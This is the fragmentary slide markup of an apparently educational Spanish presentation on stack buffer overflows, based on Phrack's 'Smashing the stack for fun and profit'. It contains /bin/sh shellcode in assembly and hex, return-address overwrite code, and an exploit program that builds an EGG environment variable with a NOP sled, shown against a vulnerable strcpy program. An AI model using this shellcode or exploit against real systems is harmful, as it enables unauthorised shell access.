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71F-9810-400F-9E88-CD6FCD0A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D54-C833-47B0-8EFF-17C4352C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0E8E-3A23-4276-8FEC-43157E2B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C5F-7049-48EC-9F1A-00EF742B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06A-D0BA-4D14-9C91-AC56BE61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7DFE-7533-4BCF-AE46-006B71DD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435-9364-48EE-ABE7-E9793DB9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9995-9047-49F7-8828-283A0FC9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2E9D-30DE-4062-915F-BE891190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5B0-9AE8-4219-A11D-619D6AB5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BCEC-F1C9-4DE0-8D86-7811AC15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6B6-D976-4776-9281-0A90831C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3A4F-CB07-4220-A0AA-C92447437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1040" y="733320"/>
            <a:ext cx="7807320" cy="11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oyecto E.L.A.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6320" y="1906200"/>
            <a:ext cx="82501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aques basados en Desbordamiento de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Buffer Overflo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46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demos cambiar la direccion de retorno de una funcion desbordando el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mbiaremos la direccion de retorno para que apunte al codigo que queremos ejecu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 codigo sera una shell de UN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 codigo estara en la pila, dentro del buffer que queremos desbor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 codigo que genera una shell de UNIX lo llamaremo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9179-5455-46BC-BB91-B258E071BD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80060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3809880"/>
            <a:ext cx="2438280" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 65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Shell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84800" y="3373560"/>
            <a:ext cx="412200" cy="30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27880" y="5761080"/>
            <a:ext cx="249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23320" y="3962520"/>
            <a:ext cx="663480" cy="1904760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2032" h="5356">
                <a:moveTo>
                  <a:pt x="0" y="5355"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2031" y="5355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2031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05280" y="2239920"/>
            <a:ext cx="2040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94400" y="5380200"/>
            <a:ext cx="39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'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2960" y="2273400"/>
            <a:ext cx="3830760" cy="3724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hellcode = ".......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functio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buffer[16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*re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trcpy(buffer, shellcod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94400" y="3379680"/>
            <a:ext cx="294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3840" y="5170320"/>
            <a:ext cx="452160" cy="3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48080" y="3754440"/>
            <a:ext cx="823680" cy="3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2743200"/>
            <a:ext cx="24382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3352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62720" y="3809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5334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57150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62720" y="4191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45720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4952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6054-A72C-4E55-BDF7-CCCE3B9C22E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752480" y="2819520"/>
            <a:ext cx="0" cy="533160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="108000">
            <a:solidFill>
              <a:srgbClr val="33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48320" y="1752480"/>
            <a:ext cx="3124080" cy="373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jmp    0x1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opl   %es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si,0x8(%es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xorl   %eax,%ea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b   %eax,0x7(%es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ax,0xc(%es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b   $0xb,%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si,%eb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eal   0x8(%esi),%ec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eal   0xc(%esi),%ed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   $0x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xorl   %ebx,%eb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bx,%ea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c    %ea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   $0x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all   -0x2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string \"/bin/sh\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040" y="14436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51640" y="2631960"/>
            <a:ext cx="1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4960" y="1143000"/>
            <a:ext cx="3703680" cy="17139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main()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*name[2]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name[0] = "/bin/sh"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name[1] = NULL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xecve(name[0], name, NULL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exit(0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72400" y="1981080"/>
            <a:ext cx="733320" cy="3200400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2243" h="9606">
                <a:moveTo>
                  <a:pt x="54" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2242" y="9605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="9605"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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72400" y="2133720"/>
            <a:ext cx="411120" cy="2895480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1256" h="8646">
                <a:moveTo>
                  <a:pt x="0" y="8645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1255" y="8645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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71840" y="5468760"/>
            <a:ext cx="29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05680" y="582948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72400" y="1828800"/>
            <a:ext cx="1074600" cy="4081320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3130" h="11953">
                <a:moveTo>
                  <a:pt x="0" y="11952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3129" y="11952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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6840" y="5533920"/>
            <a:ext cx="349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22880" y="5648400"/>
            <a:ext cx="334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4114800"/>
            <a:ext cx="1403280" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="108000">
            <a:solidFill>
              <a:srgbClr val="33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7720" y="3081240"/>
            <a:ext cx="18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52000" y="1339920"/>
            <a:ext cx="1538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–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889480" y="59277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08240" y="5318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00280" y="47847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648320" y="6095880"/>
            <a:ext cx="3124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5486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772400" y="5486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648320" y="5029200"/>
            <a:ext cx="3124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648320" y="2050920"/>
            <a:ext cx="3124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7480" y="3389400"/>
            <a:ext cx="2809800" cy="33069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opl   %es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si,0x8(%es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xorl   %eax,%ea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b   %eax,0x7(%es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ax,0xc(%es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b   $0xb,%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si,%eb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eal   0x8(%esi),%ec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eal   0xc(%esi),%ed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   $0x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xorl   %ebx,%eb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%ebx,%ea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c    %ea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   $0x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string \"/bin/sh\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648320" y="5784840"/>
            <a:ext cx="3124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648320" y="5251320"/>
            <a:ext cx="3124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2F4-B87C-4CA1-B447-C2CDC7470C0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5638680" y="1676520"/>
            <a:ext cx="297180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hell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1040" y="14436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51640" y="2436840"/>
            <a:ext cx="1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7720" y="3147840"/>
            <a:ext cx="18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2680" y="1781280"/>
            <a:ext cx="4388040" cy="38574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shellcode[] =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eb\x1f\x5e\x89\x76\x08\x31\xc0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88\x46\x07\x89\x46\x0c\xb0\x0b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89\xf3\x8d\x4e\x08\x8d\x56\x0c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cd\x80\x31\xdb\x89\xd8\x40\xcd"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80\xe8\xdc\xff\xff\xff/bin/sh"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main()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*re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t = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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(int *)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&amp;ret + 2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(*ret) = (int)shellcod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1676520"/>
            <a:ext cx="2971800" cy="411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638320" y="35053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63832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638320" y="5181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638320" y="4800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76720" y="478620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91480" y="51498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91840" y="545472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34080" y="3581280"/>
            <a:ext cx="68832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I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4520" y="1676520"/>
            <a:ext cx="9410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18080" y="1676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518080" y="4267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610480" y="1828800"/>
            <a:ext cx="304920" cy="3809880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1104" h="384">
                <a:moveTo>
                  <a:pt x="0" y="384"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1104" y="384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104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15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0B9-F5D7-4771-BA7E-39A02901128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ganizacion de Procesos en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bordamiento de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Funcionamiento de los Explo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A9BC-0105-408D-B986-60BA6C0078A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mos visto como ejecutar nuestro shellcode cambiando la direccion de ret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mos a ver como desbordar el buffer de forma que sobreescriba la direccion de ret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BEC-DA65-43B5-973A-DCF08D34E55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1040" y="11268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2560" y="1962000"/>
            <a:ext cx="18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8000" y="1438200"/>
            <a:ext cx="4692600" cy="4804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shellcode[]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eb\x1f\x5e\x89\x76\x08\x31\xc0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88\x46\x07\x89\x46\x0c\xb0\x0b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89\xf3\x8d\x4e\x08\x8d\x56\x0c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cd\x80\x31\xdb\x89\xd8\x40\xcd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"\x80\xe8\xdc\xff\xff\xff/bin/sh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large_string[128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mai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buffer[96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ong *long_ptr=(long *)large_strin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or (i = 0; i &lt; 32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*(long_ptr + i) = (int) buff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or (i = 0; i &lt; strlen(shellcode)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arge_string[i] = shellcode[i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trcpy(buffer,large_string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61080" y="4008600"/>
            <a:ext cx="1892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–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ain(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408800" y="633420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76400" y="604188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68560" y="6008760"/>
            <a:ext cx="349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29280" y="613728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43840" y="17780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hell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87640" y="474984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93880" y="4422600"/>
            <a:ext cx="77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ong_p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00600" y="4441680"/>
            <a:ext cx="32688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29280" y="4568760"/>
            <a:ext cx="371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40240" y="1192320"/>
            <a:ext cx="651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a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709040" y="743040"/>
            <a:ext cx="69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8913960" y="4791240"/>
            <a:ext cx="1440" cy="176184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908920" y="1557360"/>
            <a:ext cx="1800" cy="1866960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36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81840" y="28224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arge_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93960" y="530532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43560" y="1600200"/>
            <a:ext cx="23623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6343560" y="23623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19880" y="4419720"/>
            <a:ext cx="23032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419880" y="472428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419880" y="502920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419880" y="601992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419880" y="632448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43560" y="2362320"/>
            <a:ext cx="2362320" cy="1447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amp;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amp;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amp;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amp;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43560" y="2362320"/>
            <a:ext cx="23623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419880" y="5029200"/>
            <a:ext cx="2286000" cy="1599840"/>
            <a:chOff x="6419880" y="5029200"/>
            <a:chExt cx="2286000" cy="1599840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="301" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6419880" y="5029200"/>
              <a:ext cx="2286000" cy="15998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&amp;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&amp;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&amp;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&amp;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19880" y="5029200"/>
              <a:ext cx="2286000" cy="842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hell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4952160" y="2400480"/>
            <a:ext cx="1038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arge_st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73080" y="5095800"/>
            <a:ext cx="618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9120" y="5210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7C0-71FB-42CB-89B2-5144E089A98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bl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 la practica intentaremos explotar el buffer de otro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sabemos en que direccion de memoria el programa coloca el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uc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rmalmente, todos los programas tienen la pila en la misma direc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scaremos la direccion del buffer modificando el desplazamiento del shellcode dentro de la pi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32B-24AD-41D8-8556-A4A573F6F29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447920" y="3809880"/>
            <a:ext cx="2209680" cy="2438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lloc(bsize)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47920" y="3048120"/>
            <a:ext cx="220968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71040" y="144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2095560"/>
            <a:ext cx="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2520" y="1046160"/>
            <a:ext cx="3843360" cy="14997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main(int argc, char *argv[]) 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buffer[512]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f (argc &gt; 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trcpy(buffer,argv[1])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254480" y="1046160"/>
            <a:ext cx="4730760" cy="56552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#define DEFAULT_OFFSET               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#define DEFAULT_BUFFER_SIZE                    5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shellcode[]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\xeb\x1f\x5e\x89\x76\x08\x31\xc0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\x88\x46\x07\x89\x46\x0c\xb0\x0b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\x89\xf3\x8d\x4e\x08\x8d\x56\x0c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\xcd\x80\x31\xdb\x89\xd8\x40\xcd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\x80\xe8\xdc\xff\xff\xff/bin/sh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unsigned long get_sp(void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__asm__("movl %esp,%eax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main(int argc, char *argv[]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*buff, *pt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long *addr_ptr, add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offset = DEFAULT_OFFSE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bsize = DEFAULT_BUFFER_SIZ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uff = malloc(bsiz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addr = get_sp() - offse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rintf("Using address: 0x%x\n", addr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tr = buff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addr_ptr = (long *) pt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or (i = 0; i &lt; bsize; i+=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*(addr_ptr++) = add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tr += 4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or (i = 0; i &lt; strlen(shellcode); i+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*(ptr++) = shellcode[i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buff[bsize - 1] = '\0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emcpy(buff,"EGG=",4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ntenv(buff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ystem(/bin/bash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9160" y="3795840"/>
            <a:ext cx="8452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tr, bu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3809880"/>
            <a:ext cx="2209680" cy="2438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47920" y="4114800"/>
            <a:ext cx="22096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3809880"/>
            <a:ext cx="22096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EGG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60520" y="3052800"/>
            <a:ext cx="2197080" cy="3576600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 2197080"/>
              <a:gd name="textAreaRight" fmla="*/ 2196720 w 2197080"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3576600"/>
              <a:gd name="textAreaBottom" fmla="*/ 3576240 h 3576600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="35160">
                <a:moveTo>
                  <a:pt x="17" y="0"/>
                </a:moveTo>
                <a:arcTo wR="17" hR="17" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="35143"/>
                </a:lnTo>
                <a:arcTo wR="17" hR="17" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21583" y="35160"/>
                </a:lnTo>
                <a:arcTo wR="17" hR="17" stAng="5400000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21600" y="17"/>
                </a:lnTo>
                <a:arcTo wR="17" hR="17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43200" y="2787480"/>
            <a:ext cx="654840" cy="33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92640" y="59878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\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F7A-2A1F-4B40-B90E-64799058259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172200" y="2286000"/>
            <a:ext cx="198108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2286000"/>
            <a:ext cx="198144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7760" y="2292480"/>
            <a:ext cx="2649600" cy="824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exploit2 5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Using address: 0xbffffdb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vulnerable $E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366720" y="4724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81720" y="476100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3848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81800" y="190512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exploi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18800" y="190512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vuln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70920" y="502920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ariables loc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72040" y="44956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01240" y="383076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8000" y="394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05920" y="3733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12400" y="44197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3733920"/>
            <a:ext cx="198108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352680" y="5562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352680" y="5867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72200" y="5562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72200" y="5867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95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956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3540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321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4876920"/>
            <a:ext cx="304920" cy="380880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="192" h="816">
                <a:moveTo>
                  <a:pt x="192" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192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6171840" y="3733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3886200"/>
            <a:ext cx="1600200" cy="14479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D83D-FDA1-48C0-9FDC-57C5A0E014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ganizacion de Procesos en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bordamiento de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6B8A-255B-46A6-9F72-D62C2358A37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2286000"/>
            <a:ext cx="198144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7760" y="2292480"/>
            <a:ext cx="2649600" cy="1006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exploit2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Using address: 0xbffffdb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vulnerable $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Illegal instr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366720" y="4724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81720" y="476100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3848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81800" y="190512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exploi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18800" y="190512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vuln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70920" y="502920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ariables loc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72040" y="44956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01240" y="383076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58000" y="394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3733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12400" y="44197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172200" y="3733920"/>
            <a:ext cx="1981080" cy="289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352680" y="5562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3352680" y="5867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72200" y="5562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72200" y="5867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395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3956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3540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321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67280" y="4876920"/>
            <a:ext cx="304920" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="192" h="816">
                <a:moveTo>
                  <a:pt x="192" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192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72200" y="2286000"/>
            <a:ext cx="19810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171840" y="3733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3886200"/>
            <a:ext cx="1600200" cy="14479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9802-B8B7-41ED-B204-4AEE280902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2680" y="2286000"/>
            <a:ext cx="198144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000" y="2292480"/>
            <a:ext cx="2957400" cy="1006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exploit2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00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10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Using address: 0xbffffdb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vulnerable $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Illegal instr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ex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3366720" y="4724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81720" y="476100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3848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781800" y="190512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exploi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18800" y="190512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vuln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70920" y="502920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ariables loc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72040" y="44956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601240" y="383076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58000" y="394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05920" y="3733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12400" y="44197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72200" y="3733920"/>
            <a:ext cx="1981080" cy="289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352680" y="5562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352680" y="5867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72200" y="5562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72200" y="5867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0395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3956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3540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9321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2666880"/>
            <a:ext cx="685800" cy="3353040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="192" h="816">
                <a:moveTo>
                  <a:pt x="192" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192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72200" y="2286000"/>
            <a:ext cx="19810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6171840" y="3733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8080" y="3886200"/>
            <a:ext cx="1600200" cy="14479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137-FDB1-4CB6-B5D6-EA1BDB9910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52680" y="2286000"/>
            <a:ext cx="198144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8120" y="2292480"/>
            <a:ext cx="2741040" cy="824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exploit2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00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 5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Using address: 0xbffff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bc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[aleph1]$ ./vulnerable $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MS Mincho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366720" y="4724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81720" y="476100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3848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1800" y="1905120"/>
            <a:ext cx="12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exploi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18800" y="190512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ila vuln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70920" y="502920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ariables loc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72040" y="44956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01240" y="3733920"/>
            <a:ext cx="351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58000" y="3849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05920" y="3733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12400" y="44197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72200" y="3733920"/>
            <a:ext cx="1981080" cy="289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352680" y="5562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352680" y="5867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172200" y="5562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72200" y="58672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395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956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5400" y="5867280"/>
            <a:ext cx="3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2160" y="556272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19920" y="3962520"/>
            <a:ext cx="152280" cy="2057400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="192" h="816">
                <a:moveTo>
                  <a:pt x="192" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192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172200" y="2286000"/>
            <a:ext cx="19810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171840" y="3733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3733920"/>
            <a:ext cx="1752480" cy="17524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73B9-07B2-4501-BC3D-3644CAD354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blema: tenemos que adivinar la posicion exacta donde empieza nuestro explo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ucion: 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adiremos instrucciones NOP (1 solo byte) al principio del shell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C052-6273-4F15-83FF-AEF8089914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91320" y="2057400"/>
            <a:ext cx="213336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791320" y="3733920"/>
            <a:ext cx="21333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52880" y="2119320"/>
            <a:ext cx="58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53960" y="4710240"/>
            <a:ext cx="79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10080" y="3505320"/>
            <a:ext cx="381240" cy="25146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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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81480" y="3048120"/>
            <a:ext cx="609840" cy="29718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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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952880" y="2438280"/>
            <a:ext cx="838440" cy="358164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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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28800" y="2057400"/>
            <a:ext cx="213372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28800" y="3733920"/>
            <a:ext cx="21337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891800" y="4710240"/>
            <a:ext cx="79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3505320"/>
            <a:ext cx="380880" cy="25146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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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19320" y="2971800"/>
            <a:ext cx="609480" cy="304812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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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90720" y="2438280"/>
            <a:ext cx="838080" cy="358164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240" y="1584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158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438280" y="3352680"/>
            <a:ext cx="838440" cy="3049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38280" y="2895480"/>
            <a:ext cx="838440" cy="3049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38280" y="2362320"/>
            <a:ext cx="838440" cy="30456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16200" y="1714680"/>
            <a:ext cx="74016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29400" y="22096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EE1-1401-40FF-B652-45A3427637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hrack vol 49, articulo 14: “Smashing the stack for fun and profi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508-2BA9-4309-86BB-B6B1FB3357E2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Organizacion de Procesos en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bordamiento de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F5C-B55D-40D3-9D37-4F6FFA24FD6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788080" y="3162240"/>
            <a:ext cx="1940040" cy="2359080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1940040"/>
              <a:gd name="textAreaRight" fmla="*/ 1939680 w 1940040"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 2359080"/>
              <a:gd name="textAreaBottom" fmla="*/ 2358720 h 2359080"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="26265">
                <a:moveTo>
                  <a:pt x="16" y="0"/>
                </a:moveTo>
                <a:arcTo wR="16" hR="16" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="26249"/>
                </a:lnTo>
                <a:arcTo wR="16" hR="16" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21584" y="26265"/>
                </a:lnTo>
                <a:arcTo wR="16" hR="16" stAng="5400000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21600" y="16"/>
                </a:lnTo>
                <a:arcTo wR="16" hR="16" stAng="0" swAng="-5400000"/>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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86280" y="5264280"/>
            <a:ext cx="1941840" cy="298440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 47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0680" y="377640"/>
            <a:ext cx="834840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rganizacion de Procesos en Memo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1981080"/>
            <a:ext cx="1963440" cy="3581640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1963440"/>
              <a:gd name="textAreaRight" fmla="*/ 1963080 w 1963440"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3581640"/>
              <a:gd name="textAreaBottom" fmla="*/ 3581280 h 3581640"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="39399">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:arcTo wR="15" hR="15" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="39384"/>
                </a:lnTo>
                <a:arcTo wR="15" hR="15" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21585" y="39399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9360" y="3100320"/>
            <a:ext cx="1963800" cy="180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51160" y="4308480"/>
            <a:ext cx="196380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99880" y="2344680"/>
            <a:ext cx="825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di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01680" y="3503520"/>
            <a:ext cx="651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a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02040" y="4751280"/>
            <a:ext cx="435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0360" y="1963800"/>
            <a:ext cx="16664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irecciones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emoria baj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0360" y="4905360"/>
            <a:ext cx="16664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irecciones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memoria al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89160" y="2730600"/>
            <a:ext cx="1440" cy="2035080"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="36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78360" y="1989000"/>
            <a:ext cx="1962360" cy="3573720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1962360"/>
              <a:gd name="textAreaRight" fmla="*/ 1962000 w 1962360"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3573720"/>
              <a:gd name="textAreaBottom" fmla="*/ 3573360 h 3573720"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="39333">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:arcTo wR="15" hR="15" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="39318"/>
                </a:lnTo>
                <a:arcTo wR="15" hR="15" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21585" y="3933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noFill/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86280" y="3164040"/>
            <a:ext cx="1941840" cy="299880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 47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8560" y="1616040"/>
            <a:ext cx="435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04120" y="3186000"/>
            <a:ext cx="452160" cy="3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04120" y="5184720"/>
            <a:ext cx="482400" cy="3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28000" y="3830760"/>
            <a:ext cx="11268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ocales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a fun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52440" y="5843520"/>
            <a:ext cx="19576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: Base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: Stack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6560" y="2413080"/>
            <a:ext cx="605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Lib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137120" y="4572000"/>
            <a:ext cx="1440" cy="96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145040" y="3111480"/>
            <a:ext cx="1440" cy="960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754400" y="3340080"/>
            <a:ext cx="552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99080" y="2765160"/>
            <a:ext cx="0" cy="2765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740360" y="539100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55627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343400" y="1981080"/>
            <a:ext cx="1447920" cy="2362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3595-7702-451C-B232-102099CD9C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76320"/>
            <a:ext cx="83358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rganizacion de Procesos en Memo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4680" y="1066680"/>
            <a:ext cx="4068720" cy="21146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rmAutofit/>
          </a:bodyPr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oid function (int a, int b, int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har buffer1[5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har buffer2[1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unction (1, 2, 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277440"/>
            <a:ext cx="4068720" cy="34084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 %esp,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ubl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$40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, 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......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 %esp,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ubl    $8, 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..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$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$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$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all  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..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96120" y="502128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95400" y="46958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34640" y="1600200"/>
            <a:ext cx="36972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36080" y="4692600"/>
            <a:ext cx="3956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93200" y="4721400"/>
            <a:ext cx="12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bffff9d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13720" y="4786200"/>
            <a:ext cx="1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81320" y="1600200"/>
            <a:ext cx="12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bffff9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19600" y="6529320"/>
            <a:ext cx="19386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02440" y="6400800"/>
            <a:ext cx="6836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4 by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2080" y="1085760"/>
            <a:ext cx="2544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–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(a,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28880" y="59436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28880" y="56228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30320" y="5334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45040" y="483876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45040" y="173844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1523880"/>
            <a:ext cx="190512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1862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21668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24717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69040" y="2028960"/>
            <a:ext cx="69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2776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30812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33861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3691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39956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43005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69040" y="2928960"/>
            <a:ext cx="69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4648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4952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5562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5867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2600" y="33526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2600" y="37018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2600" y="40068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2600" y="43117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649-0DA4-440A-A71F-0B455D0C8AC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ganizacion de Procesos en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Desbordamiento de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hell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9C6D-B3D4-4597-A484-87348D0E53F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76320"/>
            <a:ext cx="83358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sbordamiento de Bu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6080" y="968400"/>
            <a:ext cx="4052880" cy="26128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rmAutofit/>
          </a:bodyPr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oid function (int a, int b, int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har buffer1[5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char buffer2[1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strcpy(buffer1, "012345689ABCDEF0123456789ABCDEF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unction (1, 2, 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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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11920" y="4786200"/>
            <a:ext cx="18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6080" y="3657600"/>
            <a:ext cx="4052880" cy="31161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 %esp,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ubl  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$40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, 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......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movl    %esp,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subl    $8, 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..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$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$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pushl   $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all  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......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96120" y="502128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95400" y="46958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34640" y="1600200"/>
            <a:ext cx="36972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36080" y="4692600"/>
            <a:ext cx="39564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3200" y="4721400"/>
            <a:ext cx="12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bffff9d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81320" y="1600200"/>
            <a:ext cx="12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bffff9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19600" y="6529320"/>
            <a:ext cx="19386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02440" y="6400800"/>
            <a:ext cx="6836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4 by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92080" y="1085760"/>
            <a:ext cx="2544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–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(a,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28880" y="59436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28880" y="56228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30320" y="5334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45040" y="483876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45040" y="173844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1523880"/>
            <a:ext cx="190512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1862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21668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24717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69040" y="2028960"/>
            <a:ext cx="69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776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0812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33861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691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39956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43005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69040" y="2928960"/>
            <a:ext cx="69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4648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4952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5562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5867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2600" y="33526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02600" y="37018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2600" y="400680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2600" y="431172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2743200"/>
            <a:ext cx="1905120" cy="2514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0   1   2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4   5   6  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8   9   A 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   D   E  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0   1   2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4   5   6  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8   9   A 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   D   E  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B9A7-0F65-4BAA-8E03-8A5C44F1143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280" y="4453920"/>
            <a:ext cx="5257800" cy="22456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8a &lt;main+26&gt;:    push   $0x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8c &lt;main+28&gt;:    push   $0x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8e &lt;main+30&gt;:    push   $0x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90 &lt;main+32&gt;:    call   0x8048328 &lt;function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1" lang="en-GB" sz="13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0x8048395 &lt;main+37&gt;:    add    $0x10,%es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98 &lt;main+40&gt;:    movl   $0xa,0xfffffffc(%ebp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1" lang="en-GB" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="HG Mincho Light J"/>
              </a:rPr>
              <a:t>0x804839f &lt;main+47&gt;:    sub    $0x8,%es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a2 &lt;main+50&gt;:    pushl  0xfffffffc(%ebp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a5 &lt;main+53&gt;:    push   $0x804840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80483aa &lt;main+58&gt;:    call   0x8048268 &lt;printf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76320"/>
            <a:ext cx="833580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sbordamiento de Bu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146240"/>
            <a:ext cx="3986280" cy="3193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function(int a, int b, int c)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buffer1[5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char buffer2[10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*re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ret = buffer1 + 28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(*ret) += 10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void main()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int x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x = 0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(1,2,3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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3333cc"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="HG Mincho Light J"/>
              </a:rPr>
              <a:t>x = 1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
